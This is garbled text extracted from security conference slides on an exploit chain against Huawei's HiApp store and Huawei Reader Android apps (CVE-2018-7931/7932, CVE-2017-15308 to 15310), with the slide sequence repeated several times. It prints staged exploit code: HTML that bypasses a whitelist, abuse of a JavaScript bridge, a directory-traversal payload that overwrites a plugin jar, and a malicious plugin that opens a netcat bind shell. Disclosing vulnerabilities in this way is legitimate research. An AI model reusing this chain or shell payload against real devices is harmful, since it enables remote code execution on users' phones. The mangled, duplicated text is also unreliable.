ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
